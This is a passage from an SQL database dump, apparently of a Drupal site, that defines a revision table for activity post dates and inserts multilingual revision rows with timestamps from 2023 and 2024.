('activities', 0, 192, 692, 'en', 0, 861, '', '', 648, 906),
('activities', 0, 192, 693, 'en', 0, 861, '', '', 648, 906),
('activities', 0, 192, 693, 'ja', 0, 861, '', '', 648, 906),
('activities', 0, 193, 696, 'en', 0, 862, '', '', 648, 906),
('activities', 0, 193, 696, 'ja', 0, 862, '', '', 648, 906),
('activities', 0, 195, 699, 'en', 0, 863, '', '', 648, 906),
('activities', 0, 195, 700, 'en', 0, 863, '', '', 648, 906),
('activities', 0, 195, 700, 'ja', 0, 863, '', '', 648, 906),
('activities', 0, 196, 701, 'en', 0, 864, '', '', 648, 906),
('activities', 0, 196, 702, 'en', 0, 864, '', '', 648, 906),
('activities', 0, 196, 702, 'ja', 0, 864, '', '', 648, 906),
('activities', 0, 197, 703, 'en', 0, 865, '', '', 648, 906),
('activities', 0, 197, 704, 'en', 0, 865, '', '', 648, 906),
('activities', 0, 197, 704, 'ja', 0, 865, '', '', 648, 906),
('activities', 0, 198, 705, 'en', 0, 866, '', '', 648, 906),
('activities', 0, 198, 706, 'en', 0, 866, '', '', 648, 906),
('activities', 0, 198, 706, 'ja', 0, 866, '', '', 648, 906),
('activities', 0, 199, 707, 'en', 0, 867, '', '', 1133, 1600),
('activities', 0, 199, 708, 'en', 0, 867, '', '', 1133, 1600),
('activities', 0, 199, 708, 'ja', 0, 867, '', '', 1133, 1600),
('activities', 0, 200, 709, 'en', 0, 868, '', '', 872, 1212),
('activities', 0, 200, 710, 'en', 0, 868, '', '', 872, 1212),
('activities', 0, 200, 710, 'ja', 0, 868, '', '', 872, 1212);

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_activities_post_date`
--

CREATE TABLE `node_revision__field_activities_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_activities…';

--
-- Dumping data for table `node_revision__field_activities_post_date`
--

INSERT INTO `node_revision__field_activities_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_post_date_value`) VALUES
('activities', 0, 6, 11, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 21, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 24, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 33, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 45, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 115, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 115, 'ja', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 116, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 116, 'ja', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 116, 'ko', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 151, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 151, 'ja', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 151, 'ko', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 214, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 214, 'ja', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 214, 'ko', 0, '2023-06-03T04:43:54'),
('activities', 0, 7, 12, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 46, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 117, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 117, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 118, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 118, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 118, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 153, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 153, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 153, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 154, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 154, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 154, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 216, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 216, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 216, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 288, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 288, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 288, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 8, 13, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 23, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 110, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 110, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 111, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 111, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 111, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 112, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 112, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 112, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 113, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 113, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 113, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 114, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 114, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 114, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 152, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 152, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 152, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 215, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 215, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 215, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 9, 14, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 15, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 34, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 44, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 62, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 121, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 121, 'ja', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 122, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 122, 'ja', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 122, 'ko', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 150, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 150, 'ja', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 150, 'ko', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 187, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 187, 'ja', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 187, 'ko', 0, '2023-06-02T18:13:21'),
('activities', 0, 17, 57, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 58, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 119, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 119, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 120, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 120, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 120, 'ko', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 148, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 148, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 148, 'ko', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 149, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 149, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 149, 'ko', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 188, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 188, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 188, 'ko', 0, '2023-06-03T03:01:57'),
('activities', 0, 19, 65, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 85, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 125, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 125, 'ja', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 126, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 126, 'ja', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 126, 'ko', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 186, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 186, 'ja', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 186, 'ko', 0, '2023-06-14T02:39:46'),
('activities', 0, 20, 66, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 84, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 123, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 123, 'ja', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 124, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 124, 'ja', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 124, 'ko', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 185, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 185, 'ja', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 185, 'ko', 0, '2023-06-19T02:39:37'),
('activities', 0, 28, 217, 'en', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 218, 'en', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 219, 'en', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 219, 'ja', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 220, 'en', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 220, 'ja', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 220, 'ko', 0, '2023-07-08T02:59:26'),
('activities', 0, 29, 221, 'en', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 222, 'en', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 222, 'ja', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 223, 'en', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 223, 'ja', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 223, 'ko', 0, '2023-07-08T04:13:16'),
('activities', 0, 67, 421, 'ja', 0, '2024-02-06T04:44:02'),
('activities', 0, 68, 422, 'en', 0, '2024-04-22T02:30:00'),
('activities', 0, 68, 423, 'en', 0, '2024-04-22T02:30:00'),
('activities', 0, 68, 423, 'ja', 0, '2024-04-22T02:30:00'),
('activities', 0, 68, 424, 'en', 0, '2024-04-22T02:30:00'),
('activities', 0, 68, 424, 'ja', 0, '2024-04-22T02:30:00'),
('activities', 0, 69, 425, 'ja', 0, '2024-04-09T02:30:00'),
('activities', 0, 69, 426, 'en', 0, '2024-04-09T02:30:00'),
('activities', 0, 69, 426, 'ja', 0, '2024-04-09T02:30:00'),
('activities', 0, 71, 429, 'en', 0, '2024-05-20T14:30:00'),
('activities', 0, 71, 431, 'en', 0, '2024-05-20T14:30:00'),
('activities', 0, 71, 431, 'ja', 0, '2024-05-20T14:30:00'),
('activities', 0, 72, 434, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 72, 435, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 72, 435, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 73, 436, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 73, 439, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 73, 439, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 74, 437, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 74, 438, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 74, 438, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 74, 440, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 74, 440, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 441, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 442, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 442, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 443, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 443, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 444, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 444, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 446, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 446, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 448, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 448, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 76, 445, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 76, 447, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 76, 447, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 77, 449, 'en', 0, '2024-06-25T02:30:00'),
('activities', 0, 77, 450, 'en', 0, '2024-06-25T02:30:00'),
('activities', 0, 77, 450, 'ja', 0, '2024-06-25T02:30:00'),
('activities', 0, 78, 451, 'en', 0, '2024-06-13T02:30:00'),
('activities', 0, 78, 452, 'en', 0, '2024-06-13T02:30:00'),
('activities', 0, 78, 452, 'ja', 0, '2024-06-13T02:30:00'),
('activities', 0, 79, 453, 'en', 0, '2024-06-02T02:30:00'),
('activities', 0, 80, 454, 'en', 0, '2024-06-02T02:30:00'),
('activities', 0, 80, 455, 'en', 0, '2024-06-02T02:30:00'),
('activities', 0, 80, 455, 'ja', 0, '2024-06-02T02:30:00'),
('activities', 0, 81, 456, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 81, 457, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 81, 457, 'ja', 0, '2024-06-04T02:30:00'),
('activities', 0, 82, 458, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 82, 459, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 82, 459, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 83, 460, 'en', 0, '2024-11-06T02:38:25'),
('activities', 0, 83, 464, 'en', 0, '2024-11-06T02:38:25'),
('activities', 0, 83, 464, 'ja', 0, '2024-11-06T02:38:25'),
('activities', 0, 84, 461, 'en', 0, '2024-05-29T14:30:00'),
('activities', 0, 84, 465, 'en', 0, '2024-05-29T14:30:00'),
('activities', 0, 84, 465, 'ja', 0, '2024-05-29T14:30:00'),
('activities', 0, 85, 462, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 85, 463, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 85, 463, 'ja', 0, '2024-06-04T02:30:00'),
('activities', 0, 86, 466, 'en', 0, '2024-06-06T02:53:21'),
('activities', 0, 86, 467, 'en', 0, '2024-06-06T02:53:21'),
('activities', 0, 86, 467, 'ja', 0, '2024-06-06T02:53:21'),
('activities', 0, 87, 468, 'ja', 0, '2024-05-30T02:30:00'),
('activities', 0, 87, 469, 'en', 0, '2024-05-30T02:30:00'),
('activities', 0, 87, 469, 'ja', 0, '2024-05-30T02:30:00'),
('activities', 0, 87, 476, 'en', 0, '2024-05-30T02:30:00'),
('activities', 0, 87, 476, 'ja', 0, '2024-05-30T02:30:00'),
('activities', 0, 88, 470, 'en', 0, '2024-05-24T03:00:18'),
('activities', 0, 88, 471, 'en', 0, '2024-05-24T03:00:18'),
('activities', 0, 88, 471, 'ja', 0, '2024-05-24T03:00:18'),
('activities', 0, 89, 472, 'en', 0, '2024-05-23T03:07:37'),
('activities', 0, 89, 473, 'en', 0, '2024-05-23T03:07:37'),
('activities', 0, 89, 473, 'ja', 0, '2024-05-23T03:07:37'),
('activities', 0, 90, 474, 'en', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 475, 'en', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 477, 'en', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 477, 'ja', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 478, 'en', 0, '2024-06-24T14:30:00'),
('activities', 0, 90, 478, 'ja', 0, '2024-06-24T14:30:00'),
('activities', 0, 91, 479, 'en', 0, '2024-05-23T03:12:35'),
('activities', 0, 91, 480, 'en', 0, '2024-05-23T03:12:35'),
('activities', 0, 91, 480, 'ja', 0, '2024-05-23T03:12:35'),
('activities', 0, 92, 481, 'en', 0, '2024-05-20T03:18:59'),
('activities', 0, 92, 482, 'en', 0, '2024-05-20T03:18:59'),
('activities', 0, 92, 482, 'ja', 0, '2024-05-20T03:18:59'),
('activities', 0, 93, 483, 'en', 0, '2024-05-18T03:26:00'),
('activities', 0, 93, 484, 'en', 0, '2024-05-18T03:26:00'),
('activities', 0, 93, 484, 'ja', 0, '2024-05-18T03:26:00'),
('activities', 0, 94, 485, 'en', 0, '2024-05-18T02:32:33'),
('activities', 0, 95, 486, 'en', 0, '2024-01-08T02:30:00'),
('activities', 0, 95, 487, 'en', 0, '2024-01-08T02:30:00'),
('activities', 0, 95, 487, 'ja', 0, '2024-01-08T02:30:00'),
('activities', 0, 95, 524, 'en', 0, '2024-01-08T02:30:00'),
('activities', 0, 95, 524, 'ja', 0, '2024-01-08T02:30:00'),
('activities', 0, 96, 488, 'en', 0, '2024-05-18T02:30:45'),
('activities', 0, 96, 489, 'en', 0, '2024-05-18T02:30:45'),
('activities', 0, 96, 489, 'ja', 0, '2024-05-18T02:30:45'),
('activities', 0, 97, 490, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 97, 491, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 97, 491, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 98, 492, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 98, 493, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 98, 493, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 99, 494, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 99, 495, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 99, 495, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 100, 496, 'en', 0, '2024-06-17T02:30:00'),
('activities', 0, 100, 497, 'en', 0, '2024-06-17T02:30:00'),
('activities', 0, 100, 497, 'ja', 0, '2024-06-17T02:30:00'),
('activities', 0, 101, 498, 'en', 0, '2024-06-07T02:30:00'),
('activities', 0, 101, 499, 'en', 0, '2024-06-07T02:30:00'),
('activities', 0, 101, 499, 'ja', 0, '2024-06-07T02:30:00'),
('activities', 0, 102, 500, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 102, 501, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 102, 501, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 103, 502, 'en', 0, '2024-02-18T02:30:00'),
('activities', 0, 103, 505, 'en', 0, '2024-02-18T02:30:00'),
('activities', 0, 103, 505, 'ja', 0, '2024-02-18T02:30:00'),
('activities', 0, 104, 503, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 104, 504, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 104, 504, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 105, 506, 'en', 0, '2024-02-15T02:30:00'),
('activities', 0, 105, 507, 'en', 0, '2024-02-15T02:30:00'),
('activities', 0, 105, 507, 'ja', 0, '2024-02-15T02:30:00'),
('activities', 0, 106, 508, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 106, 509, 'en', 0, '2024-06-06T02:30:00'),
('activities', 0, 106, 509, 'ja', 0, '2024-06-06T02:30:00'),
('activities', 0, 107, 510, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 107, 511, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 107, 511, 'ja', 0, '2024-05-29T02:30:00'),
('activities', 0, 108, 512, 'en', 0, '2024-04-15T02:30:00'),
('activities', 0, 108, 513, 'en', 0, '2024-04-15T02:30:00'),
('activities', 0, 108, 513, 'ja', 0, '2024-04-15T02:30:00'),
('activities', 0, 109, 514, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 109, 515, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 109, 515, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 110, 516, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 110, 517, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 110, 517, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 111, 518, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 111, 519, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 111, 519, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 112, 520, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 112, 521, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 112, 521, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 113, 522, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 113, 523, 'en', 0, '2024-05-29T02:30:00'),
('activities', 0, 113, 523, 'ja', 0, '2024-05-29T02:30:00'),
('activities', 0, 114, 525, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 114, 526, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 114, 526, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 115, 527, 'en', 0, '2024-05-08T02:30:00'),
('activities', 0, 115, 528, 'en', 0, '2024-05-08T02:30:00'),
('activities', 0, 115, 528, 'ja', 0, '2024-05-08T02:30:00'),
('activities', 0, 116, 529, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 116, 531, 'en', 0, '2024-05-18T02:30:00'),
('activities', 0, 116, 531, 'ja', 0, '2024-05-18T02:30:00'),
('activities', 0, 117, 530, 'en', 0, '2024-03-27T02:30:00'),
('activities', 0, 117, 532, 'en', 0, '2024-03-27T02:30:00'),
('activities', 0, 117, 532, 'ja', 0, '2024-03-27T02:30:00'),
('activities', 0, 118, 533, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 118, 534, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 118, 534, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 535, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 536, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 537, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 119, 537, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 120, 538, 'en', 0, '2024-02-25T02:30:00'),
('activities', 0, 120, 539, 'en', 0, '2024-02-25T02:30:00'),
('activities', 0, 120, 539, 'ja', 0, '2024-02-25T02:30:00'),
('activities', 0, 121, 540, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 121, 541, 'en', 0, '2024-03-22T02:30:00'),
('activities', 0, 121, 541, 'ja', 0, '2024-03-22T02:30:00'),
('activities', 0, 122, 542, 'en', 0, '2024-02-21T02:30:00'),
('activities', 0, 122, 544, 'en', 0, '2024-02-21T02:30:00'),
('activities', 0, 122, 544, 'ja', 0, '2024-02-21T02:30:00'),
('activities', 0, 123, 543, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 123, 545, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 123, 545, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 124, 546, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 124, 547, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 124, 547, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 125, 548, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 125, 549, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 125, 549, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 126, 550, 'en', 0, '2024-04-10T02:30:00'),
('activities', 0, 126, 551, 'en', 0, '2024-04-10T02:30:00'),
('activities', 0, 126, 551, 'ja', 0, '2024-04-10T02:30:00'),
('activities', 0, 127, 552, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 127, 553, 'en', 0, '2024-03-16T02:30:00'),
('activities', 0, 127, 553, 'ja', 0, '2024-03-16T02:30:00'),
('activities', 0, 128, 554, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 128, 555, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 128, 555, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 129, 556, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 129, 557, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 129, 557, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 130, 558, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 130, 559, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 130, 559, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 131, 560, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 131, 561, 'en', 0, '2024-03-09T02:30:00'),
('activities', 0, 131, 561, 'ja', 0, '2024-03-09T02:30:00'),
('activities', 0, 132, 562, 'en', 0, '2024-01-24T02:30:00'),
('activities', 0, 132, 563, 'en', 0, '2024-01-24T02:30:00'),
('activities', 0, 132, 563, 'ja', 0, '2024-01-24T02:30:00'),
('activities', 0, 133, 564, 'en', 0, '2024-04-06T02:30:00'),
('activities', 0, 133, 565, 'en', 0, '2024-04-06T02:30:00'),
('activities', 0, 133, 565, 'ja', 0, '2024-04-06T02:30:00'),
('activities', 0, 134, 566, 'en', 0, '2024-01-22T02:30:00'),
('activities', 0, 134, 567, 'en', 0, '2024-01-22T02:30:00'),
('activities', 0, 134, 567, 'ja', 0, '2024-01-22T02:30:00'),
('activities', 0, 135, 568, 'en', 0, '2024-04-03T02:30:00'),
('activities', 0, 135, 569, 'en', 0, '2024-04-03T02:30:00'),
('activities', 0, 135, 569, 'ja', 0, '2024-04-03T02:30:00'),
('activities', 0, 136, 570, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 136, 571, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 136, 571, 'ja', 0, '2024-02-07T02:30:00'),
('activities', 0, 137, 572, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 137, 573, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 137, 573, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 138, 574, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 138, 575, 'en', 0, '2024-02-07T02:30:00'),
('activities', 0, 138, 575, 'ja', 0, '2024-02-07T02:30:00'),
('activities', 0, 139, 576, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 139, 577, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 139, 577, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 140, 578, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 140, 579, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 140, 579, 'ja', 0, '2024-01-15T02:30:00'),
('activities', 0, 141, 580, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 141, 581, 'en', 0, '2024-01-20T02:30:00'),
('activities', 0, 141, 581, 'ja', 0, '2024-01-20T02:30:00'),
('activities', 0, 142, 582, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 142, 583, 'en', 0, '2024-01-15T02:30:00'),
('activities', 0, 142, 583, 'ja', 0, '2024-01-15T02:30:00'),
('activities', 0, 143, 584, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 143, 585, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 143, 585, 'ja', 0, '2024-01-19T02:30:00'),
('activities', 0, 144, 586, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 144, 587, 'en', 0, '2024-01-19T02:30:00'),
('activities', 0, 144, 587, 'ja', 0, '2024-01-19T02:30:00'),
('activities', 0, 145, 588, 'en', 0, '2024-06-27T21:30:00'),
('activities', 0, 145, 589, 'en', 0, '2024-06-27T21:30:00'),
('activities', 0, 145, 589, 'ja', 0, '2024-06-27T21:30:00'),
('activities', 0, 146, 590, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 591, 'en', 0, '2024-06-28T02:30:00'),
('activities', 0, 146, 591, 'ja', 0, '2024-06-28T02:30:00'),
